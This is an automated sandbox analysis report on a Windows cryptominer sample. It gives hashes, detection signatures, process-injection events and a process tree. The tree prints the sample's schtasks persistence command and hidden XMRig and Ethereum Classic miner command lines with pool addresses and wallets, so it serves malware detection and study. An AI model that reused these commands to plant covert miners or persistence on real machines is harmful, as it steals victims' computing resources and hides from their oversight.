Analysis
-
max time kernel
299s -
max time network
290s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
13/03/2023, 05:06
Static task
static1
Behavioral task
behavioral1
Sample
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Resource
win7-20230220-en
General
-
Target
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
-
Size
903KB
-
MD5
7b205c65f9092ee01c821aa5b58bcc6b
-
SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb
-
SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
-
SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
SSDEEP
12288:8D5lJ0RelUsuvM/vPmyTIPjdgRSzYr9MUlu1vZdptUG5decIljrG:8D5lWYlUsuvMH+36e70
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 7 IoCs
resource yara_rule behavioral2/memory/5064-158-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/5064-159-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/5064-160-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/5064-161-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/4268-242-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/4268-243-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/4268-244-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
XMRig Miner payload 21 IoCs
resource yara_rule behavioral2/memory/804-138-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-139-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-140-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-144-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-146-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-147-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-148-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-149-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/804-163-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-226-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-227-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-229-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-230-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-231-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-232-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-233-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-234-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-288-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4708-291-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 3240 Y.exe 1820 Y.exe -
resource yara_rule behavioral2/memory/5064-155-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/5064-156-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/5064-157-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/5064-158-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/5064-159-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/5064-160-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/5064-161-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/4268-242-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/4268-243-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/4268-244-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 5064 RegSvcs.exe 5064 RegSvcs.exe 4268 RegSvcs.exe 4268 RegSvcs.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3240 set thread context of 804 3240 Y.exe 74 PID 3240 set thread context of 5064 3240 Y.exe 75 PID 1820 set thread context of 4708 1820 Y.exe 85 PID 1820 set thread context of 4268 1820 Y.exe 86 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\1601268389\3877292338.pri SearchUI.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri SearchUI.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3028 schtasks.exe 3940 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3040 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Modifies registry class 36 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3240 Y.exe 3240 Y.exe 3240 Y.exe 1820 Y.exe 1820 Y.exe 1820 Y.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 652 Process not Found 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2248 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe Token: SeDebugPrivilege 3240 Y.exe Token: SeLockMemoryPrivilege 804 vbc.exe Token: SeLockMemoryPrivilege 804 vbc.exe Token: SeDebugPrivilege 1820 Y.exe Token: SeLockMemoryPrivilege 4708 vbc.exe Token: SeLockMemoryPrivilege 4708 vbc.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 804 vbc.exe 4708 vbc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4120 SearchUI.exe 5056 SearchUI.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 2248 wrote to memory of 2484 2248 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe 66 PID 2248 wrote to memory of 2484 2248 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe 66 PID 2484 wrote to memory of 3040 2484 cmd.exe 68 PID 2484 wrote to memory of 3040 2484 cmd.exe 68 PID 2484 wrote to memory of 3240 2484 cmd.exe 69 PID 2484 wrote to memory of 3240 2484 cmd.exe 69 PID 3240 wrote to memory of 4400 3240 Y.exe 70 PID 3240 wrote to memory of 4400 3240 Y.exe 70 PID 4400 wrote to memory of 3028 4400 cmd.exe 72 PID 4400 wrote to memory of 3028 4400 cmd.exe 72 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 804 3240 Y.exe 74 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 3240 wrote to memory of 5064 3240 Y.exe 75 PID 1820 wrote to memory of 2556 1820 Y.exe 81 PID 1820 wrote to memory of 2556 1820 Y.exe 81 PID 2556 wrote to memory of 3940 2556 cmd.exe 84 PID 2556 wrote to memory of 3940 2556 cmd.exe 84 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4708 1820 Y.exe 85 PID 1820 wrote to memory of 4268 1820 Y.exe 86 PID 1820 wrote to memory of 4268 1820 Y.exe 86 PID 1820 wrote to memory of 4268 1820 Y.exe 86 PID 1820 wrote to memory of 4268 1820 Y.exe 86 PID 1820 wrote to memory of 4268 1820 Y.exe 86 PID 1820 wrote to memory of 4268 1820 Y.exe 86 PID 1820 wrote to memory of 4268 1820 Y.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAA10.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3040
-
-
C:\ProgramData\telemetry\Y.exe"C:\ProgramData\telemetry\Y.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"5⤵
- Creates scheduled task(s)
PID:3028
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:804
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5064
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4120
-
C:\ProgramData\telemetry\Y.exeC:\ProgramData\telemetry\Y.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"3⤵
- Creates scheduled task(s)
PID:3940
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4708
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 02⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4268
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5056
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
903KB
MD57b205c65f9092ee01c821aa5b58bcc6b
SHA128f2aeded861c37d6fd90ddb791721a653079cfb
SHA25690ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA5121661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
Filesize
903KB
MD57b205c65f9092ee01c821aa5b58bcc6b
SHA128f2aeded861c37d6fd90ddb791721a653079cfb
SHA25690ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA5121661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
Filesize
903KB
MD57b205c65f9092ee01c821aa5b58bcc6b
SHA128f2aeded861c37d6fd90ddb791721a653079cfb
SHA25690ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA5121661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
Filesize
4.6MB
MD5412ff258a6e1abc84d63455fdccfaf14
SHA1b34119a96f9f0f3f994a3996681af99c013a8332
SHA256f87a06752fd48643260a706ffc0b9f4b1c9ef0f152290437e566ee2551e18c84
SHA512ed1a42ed5ebe311bcd26250ce00afb3fd11f8c1acb750b4b4917a4ad447dbe8067ff846dfcae22327100d7fbcc4d1e38d946007287f0feae17b2115d31276413
-
Filesize
5.1MB
MD5a3d7148655137e92c28b33e48d088088
SHA1bc98804abf481e58c925a0810c519c6c5f2d3ac0
SHA2565b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f
SHA512ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373
-
Filesize
1KB
MD59bfb0f51f319fb79c0bb1f4f9fcfc7e1
SHA1367776be8a224b0ee8271dce1723eb675a1964b2
SHA25635d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3
SHA5120b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\HMM2HWB4\microsoft.windows[1].xml
Filesize97B
MD528840f4f5ece807a664852066fb8f248
SHA1a21e39c7615b591d90961c1d1abdd8be131bc2a1
SHA2560fcd201e265363ed3e996671c86e0f878cde478fb62760bdb56ffa3544e1a3d0
SHA512abe71f64d3c2078070168d33ef8804b9b5434763f2c38cdbee10871b846dd0c3486deb91f38a78304a7fcee7f224b513850cd04e1d4f5dd93971f18ba660fb0b
-
Filesize
139B
MD503de07de07df7a81f5f2f0d8e65b74db
SHA1606f320b08ea9c3bd4326126e6e00c310034e582
SHA256e90414bfd46a6899a9fed77958d93e63acf6dfec2d4ee01c98b6f44893d0772d
SHA512883758438a9c4a86344334dee96b517145f89db2eb90d31a3f7352f662b8d7c04addd9fd80e0ff4f0364c23315bdc8f1251d894c418b3049fd4c363f3d7d8866